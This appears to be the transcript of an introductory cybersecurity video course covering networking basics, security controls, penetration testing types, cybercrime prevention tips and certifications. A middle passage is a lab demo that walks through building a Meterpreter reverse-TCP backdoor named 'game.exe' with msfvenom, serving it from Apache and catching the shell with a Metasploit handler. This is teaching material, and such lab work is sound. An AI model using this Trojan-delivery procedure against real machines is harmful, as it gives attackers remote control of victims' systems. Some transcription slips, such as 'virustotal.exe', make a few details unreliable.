DNS server. The DNS server is queried. The IP address of google.com is identified, pasted onto the packet, and then the packet is routed through the router to the path that it has determined to reach the google.com server. Here, replace google.com with cybersecurity.com. So, as you can see on the screen, the local PC queries the DNS server. The DNS server replies back with the IP address. Now, if you're wondering how does this work, if we're going to take an example of home networks, the ISP or the internet service provider gives us a default gateway or a router with their own IP addresses for DNS servers and default gateways. So when we try to connect through the router has the IP address of the DNS server and it routes that query to the DNS server. The DNS server replies back with the appropriate IP address. The router then takes that IP address, figures out the path and sends it across to the targeted server. DHCP or the Dynamic Host Configuration Protocol. It is a protocol that dynamically assigns IP addresses to the devices in the network. So we have discussed that IP addresses are required by computers to communicate within each other. But who associates or who gives these IP addresses to these computers? So for that to happen, we have got a DHCP server that is created. If you take your home networks, it is the router that has the DHCP role installed on it. So whenever a machine boots up, it sends out a broadcast request looking for the DHCP server, and then there's a communication with the DHCP server. The DHCP server then allocates an IP address to the computer who is requesting it, and once the IP address is allocated, an entry is made in the DHCP server's cache with the corresponding MAC address of that particular machine. Then we come to the next topic called VPN or a virtual private network. It is a connection between a VPN server and a VPN client. It's basically an encrypted channel that you're creating between two endpoints. And the main reason for a VPN is to encrypt your data so that it is now no longer subject to man-in-the-middle or eavesdropping or modification attacks. So this is a layer of security that you're adding when you're connecting to the internet using an encrypted channel, which would prevent you from getting hacked or your data being compromised by hackers. So as you can see here, and if you remember the previous slides that we have seen, the hacker was able to copy the data very easily. Now that it is an encrypted channel, even if the hacker tries to eavesdrop and capture that data, it will be formatted in such a way that they would not be able to make sense out of it. Now the attacker or the hacker will have to try to decrypt the data. So that's another attack that they'll have to execute to find out the encryption key, decrypt the data, and then look at what the data was. Then we come across botnet. Now let's first understand what bots are. Bots are nothing but the softwares that can be installed on vulnerable machines that would allow the hacker to send commands to the infected machines to generate some traffic or to do what the command tells them to do. So most of the botnets are used for distributed denial of service attack. If you remember the DOS and DDoS that we discussed a while back, this is where we tie it up with how they are executed. So a bot master or a hacker, let's call them a hacker, would try to identify vulnerable devices across the internet and try to install the bot onto those devices. The bot essentially is a software that would revert back to the bot master and advertise their availability whenever they have been powered on. A collection of such infected devices would essentially be called a botnet. When there are enough number of machines that the attacker feels are good enough to launch that attack on the targeted servers, the hacker will then initiate those devices, send the commands through the bot master to the bots, and the bots would then generate that kind of traffic, whatever they have been configured for, and then attack the targeted server. Now, this is also done to mask the identity of the hacker. Since the attack is being generated through the botnet, the IP addresses of the botnet computers would be reported to the targeted server, not the actual hacker's IP address. So to figure out who the attacker was would be very much difficult depending on the size of the botnet. So this, you can see, is the attack that has been created over the victims, and the malicious traffic has been generated through the botnet and the victims have been targeted through that. So as said, once that traffic has been done, to forensically investigate at the victim's end, they would find the IP addresses of the botnet and not the attacker. Alright, let's start talking about network security controls. Network security controls are nothing but implementations of various devices to enhance the security of a particular network. These could be firewalls, intrusion detection systems or intrusion prevention systems, honeypots, unified threat management systems, and so on and so forth. The next gen firewalls that we talk about, right? So let's look at a review of what these devices are. Now, a firewall can be a hardware or a software that is responsible for allowing or disallowing a certain amount of traffic to or from your computer. So these are basically created to enhance the security posture of your network, where you can configure them for certain level of traffic to be allowed or some traffic to be disallowed. Now, a firewall is not going to decide by itself what is a good amount of traffic or what is bad traffic. You're going to configure the firewall by creating rules based on IP addresses, port numbers, protocols, and what may. And based on this, the firewall will then analyze the traffic coming in or going out to the inbound or the outbound rules. And if the traffic is allowed, it will allow the traffic to go through. If there's an explicit rule which says deny the traffic, it will drop the packets or it will delete the packets. It will not allow the packets to go past it. So if it is good traffic, that means it matches a rule that has been created that allows that traffic to go through, the firewall will allow it. If it's bad traffic, that means that there is a rule which denies that traffic to pass through. It will get blocked at the firewall level itself. The firewall will not allow it to enter the network. Similarly, an intrusion detection system, it is designed to detect unauthorized access to systems or intrusion attempts as well. Now, it works along with the firewall, and the main thing is that here there's a database against which it can compare the traffic. So most of the attacks that we have talked about, there are some distinct signatures that would cause concern or that would highlight that kind of an attack. Most of the organizations try to develop these kind of signatures, have them in a database and store them on the IDS so the IDS can analyze the incoming traffic, look at patterns from the traffic coming in or going out, compare it to the database of the signatures that it has, and if it matches any of the signatures, it will then detect that as an attack and send an alert to the administrator, where the administrator will then have to manually come in and check it out. An intrusion prevention system, as described earlier or as mentioned earlier, can be configured to react to that particular event. So if it detects something that can be classified as an intrusion, an administrator can pre-configure it to react to that particular packet in a particular manner. For example, drop the packets or reflect them to a honeypot or warn the administrator or do all of these things at the same time. So as you can see on the diagram and the internet, there's a hacker, they send some the data packets come in. The firewall is not able to analyze the traffic because a firewall cannot analyze the contents of a packet. It can only look at the header, it can only look at the IP addressing and the ports that have been created or the rules on which those things have been mentioned. And then it allows the data to go through. It reaches the IDS. The IDS then looks at two ways to scan. One is a signature that we've just spoken about, where the developer of the IDS creates those signatures and stores them onto the database, or another thing that is known as heuristic scanning, which is nothing but behavioral scanning. So it looks at the behavior of the data, and if the behavior looks malicious, it will then raise an alert and warn the administrator. Then let's come to honeypots. We just discussed in the previous slide that an IPS or an intrusion prevention system can be pre-configured that if it detects an anomaly or if it detects an intrusion, it may redirect the traffic to a honeypot. What is a honeypot? A honeypot is a decoy system. It is created to showcase a certain set of vulnerabilities to try to attract the attention of an attacker. Now, the word here is used as lure, but it's more to deceive the attacker. For example, if the attacker has been able to bypass your firewall and your IDS and now can scan the entire subnet, when they scan it, they would come across a device which is pretty vulnerable or showcases some vulnerabilities, which would definitely impress the hacker, because they would think that it is a vulnerable server which contains some valuable data. And that's exactly what honeypot is. It's a decoy server trying to act as a production server, trying to showcase that it has some valuable data, but also has some vulnerabilities in it so that the attacker can be attracted towards it and spend some time trying to attack it or analyze the honeypot. At the same time, the honeypot will analyze the data traffic and it will warn the administrator of a possible intrusion, which will give the administrator enough time to secure the rest of the network, and will also get to analyze the logs of the honeypot to try to understand what kind of attacks the attacker is trying to create and try to reverse engineer and identify the attacker at the same time. let's talk about security testing. Security testing is nothing but a method which is carried out to identify threats and loopholes in a system. So here we are going to do a vulnerability analysis and penetration test. We may also go ahead and do a security audit. So what is vulnerability scanning, penetration testing, and security auditing? Vulnerability scanning is the activity which you're conducting to identify or look at possible weaknesses or issues or vulnerabilities or misconfigurations that exist in your infrastructure. So it is a proactive way where a team of security experts will launch a vulnerability scanner, scan certain devices that they've pre-identified, and once the report from the vulnerability scanner comes in, try to analyze the report and make sense out of it to see if there are any vulnerabilities that can be identified on those devices. This is obviously an ongoing process. Why? Because operating systems are patched, upgraded, new versions of softwares are released, and we keep on upgrading and we keep on changing our IT infrastructure ever so often. And hence, the IT infrastructure, like I say, is an ever evolving process. And to be abreast of all the latest vulnerabilities and threats, we need to do the vulnerability analysis in an ongoing manner to identify possible threats to the organization. So then what is penetration testing? Vulnerability analysis is just identifying the vulnerabilities, gaps, misconfigurations that may be in the organization's infrastructure. A penetration test is basically to validate whether those vulnerabilities that have been reported are real. If yes, how complex are they? What would be the impact? And what would be the technological impact? And what kind of data would be compromised? Or what would be the end result of that attack if it actually happens in the real world? So here, a bunch of ethical hackers would simulate an attack from a hacker's perspective or from an insider's perspective, a malicious outsider or a malicious insider, depending on how they perceive the vulnerability as. And then they will try to test the vulnerability to see how it can be exploited, to what extent it can be exploited, and what would be the compromise or what would be the data leakage that would happen if this vulnerability gets exploited. So there are three ways a penetration test can be conducted. There is a black box testing, a gray box testing, and a white box testing. If you look at black box testing, this is where the tester, or the penetration tester rather, has no knowledge about the organization, their infrastructure, applications, or anything. So this is where you're simulating a hacker who's sitting on the outside, who has no knowledge about the organization. So they start from the information gathering phase, where they're going to try to figure out the IP addresses, the IP ranges, devices, operating systems, applications, and anything and everything that the organization is going to use, and then try to figure out vulnerabilities within them, and then try to attack those vulnerabilities. This is a very time consuming and a cost consuming audit. The second one is a gray box testing audit, where a partial knowledge is given to the penetration tester. So this simulates a regular user kind of an attack. So let's say if I'm a regular user in an organization, and when I say regular user, I'm saying I'm not an administrator. So I have got limited access. And based on that limited access and the limited knowledge that I can gather about the infrastructure by being a regular employee, we are going to simulate a test with that knowledge to see whether an employee can take disadvantage of any vulnerabilities and then try to worm their way into the organization's infrastructure and hack it. The white box testing, on the other hand, is where we're looking at an insider, a malicious insider who already has all the accesses, who already has all the controls in his hand. So simulating an administrative access and then trying to figure out whether this administrator can escalate their privileges and gain some other administrator's access and try to then compromise data. For example, even if I'm saying I'm an administrator, I am not the only administrator in the organization. There would be backup administrators, there would be system administrators, there would be the Active Directory administrators, there would be application administrators, database administrators, and so on and so forth. So every single component that we have may have a different administrator. For example, switches would have a different administrator. Same thing with firewalls or any other security controls that you have. So if I am a administrator for backup, can I then try to worm my way out, escalate my privileges as a regular administrator or a system administrator, and then crack their passwords, try to get access and manipulate some data? So these are the three types of penetration testing audits that you will come across. There would be some different subtypes, but every organization can customize these kind of audits to whatever they require. Then we come to security auditing. Security auditing is nothing but an internal check that is carried out by internal auditors. That means people who are employees within the organization to find out flaws in the organization's information system. Now, this is more on the compliance side. This may take inputs from the vulnerability assessment and the penetration test, but overall we want to see what kind of policies that we have in our organization, whether those policies are working properly, whether they make sense, are there any gaps, and based on the technical inputs from the VAPT team, how do we map with the policies that we have defined for that organization. For example, a password policy. Now, we have documented that a password policy should be effective enough that passwords cannot be easily brute forced. So that's a high level policy. Then we dictate a procedure for that policy to be implemented, where we say, hey, we want the systems to be configured where the password meets some complexity standards. For example, should be uppercase and lowercase A through Z, 0 through 9, should use special characters, and should be randomized password, should not be dictionary based or based on the user's name. Now, this is the policy that we have created and the procedures that we have defined. Are they being actually implemented in the real world? So a vulnerability analysis would determine whether the passwords are probably weak or not. So if the vulnerability report comes back and says the passwords are probably weak, then a penetration tester would go in and then try various attacks to see if passwords can be compromised. And if yes, they would then look at the complexity of the passwords, compare it to the procedures and the policies. And if they do not match, that's where your security auditing comes into the picture. So you're basically tying up the policy, the procedures, and the actual implementation that you have created in an organization. Now, first and foremost, what is cybersecurity? There are three main pillars of cybersecurity that we deal with since the inception of computers, and they're known as the confidentiality, integrity, and availability triad, also known as CIA. Not to be confused with the American Intelligence Agency, but here we're looking at three different pillars where we want our data to remain confidential, the integrity of the data to be intact, and the data to be made available at all points in time. So let's talk about these three aspects. The principle of confidentiality asserts that the information and functions can be accessed only by authorized parties. So, for example, even if you password protect your file, what is it that you're trying to do? You're trying to prevent other users accessing your data and peeping into your files so that your data remains confidential. It is only shared with people who know the password. Integrity. This is where the trustworthiness of that data comes into the picture, where if the data is going to be changed, for example, you have a spreadsheet which has a lot of information about users and their login activities and whatnot, and you want to ensure that that data is not modified by any unauthorized user. So you're going to verify that the information is correct and is not modified by anybody who's unauthorized. The availability part ensures that this data is made available to all authorized users when and where they want it, right? The principles of availability assert that in systems, functions, and data must be available on demand according to agreed upon parameters based on levels of service. Now, this is where your service level agreements would come in. For example, when we log on to Gmail, we always assume that Gmail is going to work and is going to be available online. At no point in time, or very few times, has it ever occurred that you've gone onto the internet, typed in gmail.com, and the website is not available. In fact, if the website doesn't open, we figure out the internet is not working, right? But Gmail as a service is always made available. Now, when we talk about threats to CIA, the confidentiality, integrity, and availability, we talk about them in two different parameters, cybercrime and hacking. So, what is cybercrime? Cybercrime is any criminal activity or any unauthorized activity that would involve the usage of any computing device which would result as a security incident at the victim's end. Most cybercrimes are carried out in order to profit from them. Criminals would try to do phishing attacks to steal your money out of your bank accounts, or would try to con you into giving out your credentials, thus compromising your email accounts or your social media accounts, and try to gain access to your identity. Cybercrimes are generally carried out against computers or devices directly to damage or disable them, spread malware, steal secret information, etc. So this talks about the motivation part of cybercrimes. What would be the motivational aspect for a person to conduct such an activity, right? So basically to cause damage, like WannaCry happened in 2017. The perpetrators, those used WannaCry, probably gained a lot in the ransom that they demanded for that data to be decrypted, but it also cost the world a lot of money in profits that were lost. Right, let's move on to tackling cybercrime. So what do we mean by cybercrime? Now again, if you remember a few slides back or a few topics back, we talked about information security and we talked about cyber security, and we talked about the difference between both of them. Information security could be about anything, normally contained within the organization, the data that the organization has, and us securing those data by introducing the security controls that we talked about. Cyber security would be something that is on the internet or on the web. So any web application that I have deployed on the internet, any databases that I have, that would talk about cybersecurity. So if your Facebook account gets hacked or your OneDrive gets hacked, that's where cybersecurity comes into the picture. But if your physical computer gets hacked because your password got cracked by a physical attack, that's where your information security is. So some of the basic ways of preventing cyber attacks on us. Use unique and strong passwords. We've just discussed the complexity of the passwords. We want to keep them random. They should not be guessable. They should not be based on dictionary words, and they should be randomized in such a way that they cannot be predicted or guessed. The length of the password should be very good. Should at least the minimum, bare minimum should be 8 characters. Even that is not suggested in today's world. It has to be at least 12 to 16 characters. An operating system, I think, in today's world will support up to 24 or 26 characters. If you go into encryption softwares, they support up to 60 odd characters of passwords. So you want to keep those unique. You want to recycle those passwords on a regular basis. You do not want to reuse old passwords again and again. Avoid public Wi-Fi. That's a must. We always look for free Wi-Fi. We go to coffee shops because they advertise free Wi-Fi. That's nowadays a unique selling point for coffee shops and establishments. And we go there, we connect to the Wi-Fi because we get free internet and we get to serve whatever we want. The problem is we have no idea who else is connected to that Wi-Fi and what kind of attacks they are creating. We would discuss Wi-Fi attacks later on in one of the later videos where I can demonstrate how these attacks work. But for now, just remember that public Wi-Fis are very risky. And if your security is not up to the mark, you might just end up getting hacked like nobody's business. Ignore and delete mails from unknown senders. Phishing attacks, very common attacks in today's world. You get an email saying you've won a lottery or you've been chosen for something, or please click here to download your free software and something like that. And those emails are plenty nowadays. I received an email yesterday where there was a Nigerian prince who had died and he had left around $500 million behind. And there was this accountant who wanted to smuggle that money out. And it was a huge email giving me all the details. And out of 7 billion people on this planet, they identified my email address. And they wanted to share half the money with me so that they can masquerade the money and avoid paying taxes, inheritance taxes and whatnot. It was a ridiculous scheme. I mean, being chosen out of 7 billion, 1 out of 7 billion, our luck can't be that good, can it? So you have to be wary about these attacks. Always ask the question, if you won a lottery, did you purchase the ticket? No. So there's never a free lunch, right? So always keep on questioning the things that you've been getting. I'm not saying ignore them, because some of them may actually come true. There's always that 1% hope, but always investigate those things to see whether they are spam, if there is a fraud going on. And if yes, you yourself can communicate with the law enforcement agency and try to figure out who is responsible for that fraud. Make use of antivirus software and always keep it updated. Again, let's not go for the free antivirus softwares because they may be good at detecting infections, but when they come for disinfecting those files, then that's where they ask for money. And that's when you're going to run around and say, okay, let me see which is a very good antivirus to disinfect this kind of a infection. So there are a lot of antiviruses out there, I know that, and it's very confusing which is the best one today. Now the problem is whichever is the best one in the market may not be the best one for the operating system that you're using. For example, I mean, there would be a good antivirus for Windows 7, but the same antivirus installed on Windows 8 or Windows 10 wouldn't be that effective. So always do an investigation. The best way to look at antiviruses and identifying which antivirus suits you is to investigate that antivirus and see the detection rate of that antivirus. See how often does it detect the infections that you're looking at. What you can do is you can head on to a website called virustotal.com. That's VIRUS total.com. It's a Google-owned website. They have around 60 to 70 odd scanners on that website. Most of the known antivirus scanners are there. Try to figure out, try to see if you can get hold of an infected file. Be very careful. You don't want to get infected yourself, or your computer. You can upload it to that particular website and analyze that file and see which antivirus detects those kind of viruses. A few files, a few infections over here and there, and you'll come to know which antiviruses would work for you. Use multi-factor authentication or two-step processes for authentication. Just don't rely on a username and password. Register devices, get OTPs either on your email or on your devices. That gives you an added layer of security. If your password gets compromised, that's still okay, because now the hacker will need to simulate your phone as well. So that's added headaches, and it may just not be worth it. There are so many other people who don't use these kind of techniques who can be hacked much easily than people who have an added layer of security introduced. And be very careful when you're downloading apps. Now, when we say applications, on your mobile phones as well as in your computers. On your mobile phones, you still have a certain level of security where you can go to the Apple Marketplace or whatever it is called, the Google Marketplace or whatever it is called, and they do have some level of control. But when you talk about Windows operating systems and you're going on to the open internet to look for different kinds of softwares, you have no idea whether the website that you're on is trustworthy or is hosted by a hacker with a malware on that particular file that you're downloading, especially if you're downloading a pirated program. Never download a pirated program. So be very careful when you're downloading apps. When you're downloading an executable file, you can upload it to virustotal.exe, scan it to see if there are any viruses or malwares within it. The website also helps you analyze URLs to see if the URL itself may have any malicious attacks within them, embedded scripts or redirector scripts or things like that. So you can use that website to scan the apps that you're downloading and see if there is anything malicious about those apps. Moving on to cybercrime statistics. Now this is going to be interesting. Let's talk about how these things and the percentile of these things in today's world. By 2020, we would have generated 300 billion passwords. Now, the human population on this planet is 7 billion. Imagine 7 billion having 300 billion passwords. And I think half the population wouldn't have access to computers or the internet either. So imagine the number of passwords that we have. And that's what makes us use easy passwords, makes us repeat those passwords, and we use a single password for multiple accounts, right? Because there are just so many passwords that we have to remember. But that's the way it is. And if we want to keep ourselves secure, we are responsible for it. So please be very careful with those passwords. 24,000 malicious mobile apps blocked daily. In fact, the latest example that I can give you, I use an Android phone, and there's an application that I've always used called Cam Scanner. And recently, just 3 days back, my mobile phone started telling me that it is a malicious app, right? I've been using it for years now, probably 3 or 4 years, maybe more. What is the software? You can click pictures of a document, it will automatically convert it, it will beautify it, if that's a word, convert it into a PDF, and I can then send it as an attachment via email. A very handy app for me, or was an handy app for me. It worked beautifully, but 3 days back, suddenly the Android operating system and my antivirus on my Android phone started reporting it as a malicious software. So I went online and I checked into it, and it seemed that over a period of time, the developers changed their vision of that software, made it spyware, and then there was a dropper involved within that application which would then download a malware from a third-party server, install it, and start spying on you and start showing you malicious advertisements, right? So this was an existing app which was trusted over a period of years, and over a period of time, slowly, they modified it into a spyware. Kaspersky was an organization that detected it in the first place and then pointed it out to Google. Google took it off the Google Play Market, and now there is a variant of it available, but if you look at the reviews, all of them are 1 stars, where they have identified that this is a malware now and it spies on them and it actually compromised some people's data. So that's the latest example. In 2017 or 18, there were 700,000 apps during that year that were identified by Google as malicious apps and were deleted from Google Play. So even if they're published, there will be thousands of people who will download it till the time Google realizes that it is a malware and then deletes it. Till then, you've already been compromised, and there is no way to protect yourself now. So be very careful when you download these applications. In the healthcare sector, ransomware attacks will quadruple. Now, the healthcare sector is a very volatile sector. It contains a lot of private and sensitive information, health information about individuals that can be misused by a lot of organizations, advertisements, pharmaceutical organizations, life insurance people, and whatnot, right? So these become very lucrative targets for hackers, where if they can steal the database and sell it on the black market, they will earn a lot of money. Ransomwares would basically work the other way around. They encrypt the data at the hospital side, and then they will hold the hospital ransom to pay up. Now, you know how hospitals earn nowadays, right? So that's a lot of money that we're looking at. Cybercrime would cost up to $6 trillion in 2021. $6 trillion just for cybercrime. We're not talking about the income from the IT industry. We're talking about how much money we will lose to cybercrime because of the various attacks that would be created. 90% of hackers use encryption. Not only encryption, most of the advanced hackers will try to hide their identity by spoofing their IP addresses, MAC addresses, locations. They will use encryption and cryptography to hide their malicious softwares, to fool the antiviruses, IDSs, IPSs. And it is a very difficult task to even identify a particular malware, analyze it, and then do a root cause analysis and try to figure out who the responsible hacker was. So it's a very intensive task of doing such things, and most of the hackers would go scot-free because it is very difficult to identify them. Now, let's move on to the demo. It's a very interesting demo. We are using Metasploit, which is a penetration testing tool, and we are going to use a demo of using Metasploit. We are going to try to compromise the security of a particular system. Well, let's discuss the demo before we start executing it. So what we have done here is that we have two virtual machines on VMware Workstation. One is the Kali Linux machine, and the other is a Windows 7 machine. What we are going to do is we are going to use a penetration testing tool called Metasploit, which is available freely on Kali Linux, and we are going to use a particular payload generator on Metasploit called MSF Venom. And using MSF Venom, we are going to create a backdoor, executable file which will contain a Trojan or a backdoor, and we are going to try to infect that to the Windows machine and see what happens when the victim executes that particular file. Now we are going to keep it at the basic level. We're just going to create the Trojan and then we are going to execute it. In a later lecture or in a later video, we'll see how we can mask that Trojan into a legitimate looking application so that a victim can be fooled by the application that we're going to execute. So let's start with the demo. Alright, so this is the Kali Linux VM and the other machine is a Windows 7 virtual machine. So what we are going to do is, on the Kali Linux machine, we are going to just open up a command prompt, right? It's just a regular command prompt, your regular commands. And what we are going to do is we are going to use the MSF Venom payload generator from Metasploit to create a game.exe file. Now the Trojan will be contained within the game.exe. So the command goes as such: MSF Venom -p for platform. We want it, or rather payload at this point in time, we want the payload to be Windows Metasploit reverse _ TCP L host, and the IP address for the local host. I'll explain the command once I've typed it. Let's just check what our IP address for this machine is, and we have 192.168.71.133, and that's what we are going to type in here: 192.168.71.133, L port 4444-F exe-a x86, and we want that output in root desktop, and we want it as game.exe. So let's go through the command. The MSF Venom is the initiator command. It invokes the payload generator in Metasploit. -p is the payload. We want Windows Metasploit reverse TCP. So what is a reverse TCP? Here, the Metasploit allows us for remote code execution, where we are going to create the payload. We are going to execute the payload at the victim's end, and the payload will then generate a connection back to us being the hacker's machine, and thus the local host, which is the IP address of this machine, which is the hacker's machine that we're using right now, which is 192.168.71.133. That's why we have typed in the local host. And L port is the local port on which port do we want to listen in, or we want the payload to connect to the local host. So what we are doing is, the Metasploit allows us remote code execution. We create the game.exe, we execute it at the victim's end. It is pre-coded to connect to a local host. The IP address is coded over there to a particular port, which in this case is 4444. You can put in any port number you want. Just ensure that the port is going to be free and it is not a regularly used port. Otherwise, you're going to get problems over there. So at this point in time, we're going to keep it as 4444. -F stands for function. We want an executable file. -A stands for the architecture. Here the architecture is 886, which is x86, which is 32-bit, and we are going to export it and we are going to host it, or we are going to create the file on root desktop, and we are logged in as root, as you can see at the prompt. So when I press enter, I should see a game.exe popping up right about here on my desktop, if the command is correct, which it should be, and that's game.exe. Wait for it to be compiled properly. So there you can see platform Windows for payload, no encoder, payload size 333 bytes, and final size of executable file is 73,802 bytes. So now we have created game.exe. Now we are not going to convert this into, or we are not going to merge this into a malware and things like that. We are going to keep it simple. So to keep it simple, what I'm going to do is, as a hacker, I'm going to host this on a server, which is going to be on this same machine, right? So when we say we want to host an Apache server, the server is hosted in a directory called /var/www. So let's go there. Present working directory. We can see that we are in root cd var www, and there we are cd html, and that is where our web servers would be. So what we are going to do is we are going to create a directory mkdir shared, right, to an ls, and you can see the shared folder right here. ls-al will give you the list and the attributes, and we can see these attributes. We want to change these attributes, so we are going to use a chmod recursive command, give the permissions as 755 to the folder shared. Since we are in the same directory, we do not need to give the path for shared. Let's just verify it, and you can see the permissions being changed. And now what we are going to do is we are going to change the ownership from root to www-data for the web hosting. So chown for change ownership, recursive www-data www-data to shared. Alright, let's check if that's been done properly, and you can see that earlier it was root, and now it is www-data, right? And so that's the directory that we have created. Let's go back. What we want to do is we want to copy game.exe into this folder. So cp root desktop game.exe var www html shared, and cd shared. Let's see, we have game.exe right there. There it is. And now what we want to do is service apache 2 start. So essentially what we have done is we have created a directory in the HTML folder to host this file, and we have copied it from our desktop into the shared folder. And I'm going to pause here for a minute. Alright, so we have started the service for the Apache 2 server. That means we have started the web server. We have hosted the game.exe on the web server in the shared folder. We have changed the permissions and the ownership for the shared folder. Now we are going to go on to the Windows 7 machine, and we are going to open up the browser and see if the web server is now accessible. So if you remember, the IP address of that machine was 192.168.71.133, and we were in the shared folder. 192.168.71.133 shared, and if this is done properly, we should see the game.exe right here. And once we click on it, it's going to ask us whether we want to save the file. 72.1 KB, we're going to save it, and I'm going to save it on I think it just saved it here. And now before we execute it, we are going to go back into Kali Linux, and we are now going to start the listener. Right, so we have created the exploit, we have created the payload rather, we have hosted it onto a web server, which means that when somebody double clicks on it, the machine is going to try to create a reverse connection to our hacker's machine. But our hacker's machine needs to be configured to handle that incoming connection. So we are going to start off with msf console. Now msf console is the command which starts up Metasploit. Right, so we're just going to take a minute over here. You can see it's Metasploit framework console. It's going to start. It's does take a little bit of a while, and we're just going to wait it out. Let me turn this into full screen. I can see at the bottom left, you're on on the MSF prompt. We are using Metasploit with 1699 exploits. Now, this is not the completely updated version. The latest one would have around 1800 exploits, but the one that we want is exists in this version, so we are good to go. So we start off with the configuration of Metasploit to listen in onto that particular connection. So we say use exploit multi-handler. And when we say multi is basically something that affects multiple operating system. And we're going to use that exploit, and you can see it's now opening up the handler which we need to configure. And here we're going to set the payload that it is going to expect, the payload being Windows meterpreter reverse underscore TCP. You can see that the payload has been configured. We are going to say show options, and you'll see it is going to ask us options for the payload, which means the local host, the listen address, and the listen port. And you can see we had by default given 4444, which is the default port for this exploit within Metasploit. If you want to change, if you have changed the port when you created game.exe, you need to change the port over here as well. And the commands here, let's say set lhost equals 192.168.71.133. Enter. And I think I did a typo, so there's no equal to, that's it. And you can see now it shows the equal to mark, and we have now set the local host. If we want to set the L port, that's how we do it. We had 4444, and there it is. So if you have changed the port in the game.exe, ensure that you change the port here as well. Show options, and you'll see now the data is populated over here. Lhost, which is the local host, is 192.168.71.133, and L port, the local port, is 4444. We have configured this, and now what we're going to do is we're just going to type in exploit, and now you can see that it has started the reverse TCP handler on 192.168.71.133 on port 4444. So now when the victim, which is Windows 7, executes the file and we say run, at the victim's end, there's nothing that should happen. It's just resolving something. And at the other end, you can see that a meterpreter session has been opened, and it shows us that from the victim's IP, which is 71.129 on port 49493, we are connected to our machine. So that's the connection that has happened. Press enter, and you can see it exits the session. Let's just look at the IP address on Windows to confirm that was the same machine that we had, and that's 129. Right there it is. Let's open up this file again and see what happens. And you can see the second session being opened up right here to a PWD, and you can see that we were connected to that particular website, right? So that's what this Trojans are supposed to do, give us a backdoor entry, and we then are able to connect, and we are able to copy data, and we are able to, basically we have a backdoor, so we can do anything and everything that we want to do. Let's see, how do we become a cybersecurity expert? So essentially, who is a cybersecurity expert? A cybersecurity expert is an individual employed by an organization to protect their infrastructure, right? So this person is responsible to identify potential flaws, identify what threats the organization faces, and then streamline or create or design or architect methodology which is going to protect all the assets that the organization has. So this is going to happen through a variety of techniques, such as finding weaknesses, so vulnerability management, where you run vulnerability scanners, identify potential flaws in the organization's infrastructure. Could be applications, could be servers, could be desktops, could be operating systems, could be anything, could be network-based flaws as well. And then you're going to monitor these systems. You're going to look at the data flow that is going to the internet, through the network, through the intranet rather, and then you're going to check if there is anything malicious going on in that network. So over these techniques, you're basically going to monitor it on a day-to-day basis, on a regular basis, and you're going to try to identify if anything out of the ordinary is happening, right? After you find the weakness, you're going to test those weaknesses to identify the complexity of those weaknesses, to validate those weaknesses actually exist, and then you're going to repair them, you're going to patch them, you're going to install updates, or you're going to you're going to install mechanisms like firewalls or antiviruses to mitigate those weaknesses, and you're going thus resulting in strengthening the areas where an attack may have occurred. Let's see the domains in cybersecurity. Now, when we say domains in cybersecurity, in the previous slide we were discussing where these attacks may happen, like applications, infrastructure, network. So let's see these domains in details. Asset security. Now, when we say assets could be applications, could be networking devices, could be computers, could be routers, could be wireless access points. And these all these devices have their own operating systems, they have their own functionality, and it is important that we look at the security of each and every asset that the organization owns. Security architecture and engineering. Now, not everyone can just walk in an organization and then say, let's start implementing security in a particular manner. We have to standardize the security in such a way where the security is constant for a long period of time and is consistent, right? So for that to happen, there is an architecture, an engineering phase where we are going to create a plan of how this security needs to be implemented. For example, if I determine to install a particular antivirus, I have to ensure that the same antivirus is installed on all the systems in the organization. I cannot have different kind of antiviruses installed that do not talk to each other or do not report properly to the proper owner. So we have to create policies, procedures, and we have to implement them in a standardized manner for our security to work properly. Communication and network security. Now, with cloud computing coming in and hybrid clouds happening, where you got a deployment of a physical infrastructure talking to something that is on the cloud, let's say AWS or Microsoft Azure, right? And data flows are happening globally these days. You have to be very careful how these data are going to be transmitted across the network. Thus, you have to create those paths and ensure that those paths are monitored properly, are regulated properly, and do not have any data leakages. Similarly, identity and access management. Who is accessing my data? Are they authorized to access my data? And if yes, how am I going to authenticate them? How am I going to track them? How am I going to hold them accountable for whatever they have done? Even if a person is authorized to do something, we have to hold him accountable for that activity so that if something happens later on, we can identify who made that change. So the identity and access management module will consist of us creating groups, policies, users, roles, and interlinking them with the assets to ensure that only authorized people are able to access those devices. Security operations. On a day-to-day basis, we need to monitor the security of the organization. For example, if today I start facing a denial of service attack, or somebody starts a password attack on my organization where they're trying to crack somebody's password, there should be some internal mechanisms that are in place which will try to identify these attacks, warn the appropriate administrator, and that administrator will walk in and try to investigate that attack. So day-to-day operations are a must. Security assessment and testing. Now that we all have these mechanisms in place, are they going to remain constant for the rest of our lives? No. IT is an ever-evolving scenario. So we need to assess and test our security controls on a regular basis to ensure that there are no gaps left. What I configure today may be irrelevant tomorrow. So I have to constantly keep on looking at the latest security trends, the latest vulnerabilities that are being identified, the patches that are being installed, and I have to compare my infrastructure to all of these to see that I am compliant with the latest security standards. Software development security. So if you're an organization who's developing software and who's going to sell that software to end users, security becomes a huge part, because the end user or the buyer, if it is an organization, is going to ask what kind of security testing was done in that application. So that brings us to a software development life cycle, which talks about how you're going to create that code, how you're going to test that code, ensure that the code is secure enough. So you need to follow secure coding practices, and you're going to test the software over and over again till you're satisfied with the outcome. And then security and risk management. Now, when we come to risks are basically events that may occur compromising the security of an organization. So it is very important that we identify these risks, we map these risks, we verify how that risk is going to impact the business, and then try to figure out security controls to mitigate that risk or bring it down to manageable aspects. So that's a lot of talk, that's a lot of domains, that's a lot of attacks that we have discussed. Now let's see what kind of courses and certifications are available for us to enhance our careers and address all of these domains, all of these attacks. So starting off from a technical perspective, where we are going to look at ethical hacking or security, where we are going to assess and do a vulnerability assessment and penetration test. There are certifications from CompTIA like Security Plus, or from EC Council, which is the Certified Ethical Hacking Training, which basically allows us to become vulnerability assessment and penetration testing experts. So we'll technically be testing each and every device and trying to hack those devices to see if that vulnerability is real and what can be attained out of that vulnerability. CISSP is a very high level certification that normally is considered as a management level certification, right? So just to get certified yourself, you need at least 5 years of experience in the IT security field. This is where you get certified and you're basically a chief information security officer, where you're going to develop policies, procedures, and security control mechanisms, and you're going to standardize the security policy of the entire organization. Then you've got the CISA, or also known as the CISA, Certified Information Systems Auditor. It is from an organization called ISACA. It's more on the system side, where you're going to audit systems and you're going to verify that they are adhering to the policies that you have implemented. The CISM or SISM is the Certified Information Security Manager. This is again a project-based oriented approach where you're going to manage the security of an organization, and you're going to look at all the daily operations of the security operations center, and you're going to maintain and manage all of those functions overall. When we talked about risk assessment and risk strategy, for that we've got the CRISC, which is a Certified in Risk and Information Systems Control. Now, for these certifications, this is more on the business side of 